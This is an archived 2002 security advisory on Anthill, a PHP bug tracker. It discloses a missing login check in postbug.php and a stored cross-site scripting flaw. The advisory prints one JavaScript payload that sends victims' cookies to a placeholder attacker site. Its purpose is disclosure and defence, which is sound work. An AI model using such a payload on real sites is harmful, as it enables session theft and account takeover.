TUCoPS :: Web :: PHP :: web5250.htm

Anthill PHP Bug Tracking Database login and JavaScript vulnerabilities
9th Apr 2002 [SBWID-5250]
COMMAND

	Anthill login and JavaScript vulnerabilities

SYSTEMS AFFECTED

	all versions

PROBLEM

	Ulf Harnhammar posted following :
	

	\"Anthill is a bug tracking database system written in PHP. It  provides
	the standard  bug  tracking  features  such  as:  user  logins,  summary
	reports, submitting bugs, querying bugs,  various  severity  and  status
	levels. It also provides  some  unique  features,  such  as  a  template
	system, and multi-lingual support.\" (direct quote from  the  program\'s
	project page at Freshmeat)
	

	Anthill [http://anthill.vmlinuz.ca/]  was  written  because  the  vendor
	felt that Bugzilla was too complex. It is published under the  terms  of
	the GNU General Public License. The program is used by the  MandrakeSoft
	Secteam, among others.
	

	 ISSUES

	 ======

	

	1) New bugs are entered by accessing the script enterbug.php.  It  POSTs
	the data to the script postbug.php, which stores  it  in  the  database.
	enterbug.php checks if you\'re logged  in,  but  postbug.php  does  not.
	This means that people without  accounts  can  enter  new  bugs  in  the
	system, by creating an HTML document like  the  ones  that  enterbug.php
	displays (the same field names, the  same  action  attribute)  and  then
	simply accessing that HTML document locally.
	

	2) Almost everywhere in the program, HTML code is stored  and  displayed
	without any interference. This  makes  it  easy  for  one  user  to  add
	JavaScript code that will be  executed  by  another  user.  One  of  the
	authentication methods supported is based on cookies. If that method  is
	used, a malicious user may enter a short JavaScript snippet like:
	

	

	<script>self.location.href=\"http://www.evilsite.com/evil?\"+escape(document.

	cookie)</script>

	

	

	to steal other people\'s cookies with their login information.
	

	

	 COMMUNICATION WITH VENDOR

	 =========================

	

	The vendor was contacted, first on the 16th of March, and  then  on  the
	1st of  April.  He  realizes  that  these  bugs  affect  the  program\'s
	security, but he doesn\'t have the time to fix them, since this is  just
	a hobby project that he doesn\'t  get  paid  for.  (Hmm..  I  wonder  if
	Richard Stallman or Linus Torvalds ever thought that way.)

SOLUTION

	No  fixed  version  is  currently  available.  I  recommend   that   all
	administrators use their  web  servers\'  authentication/access  control
	facilities in their Anthill directories to keep strangers away, or  that
	they simply change to some better program.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH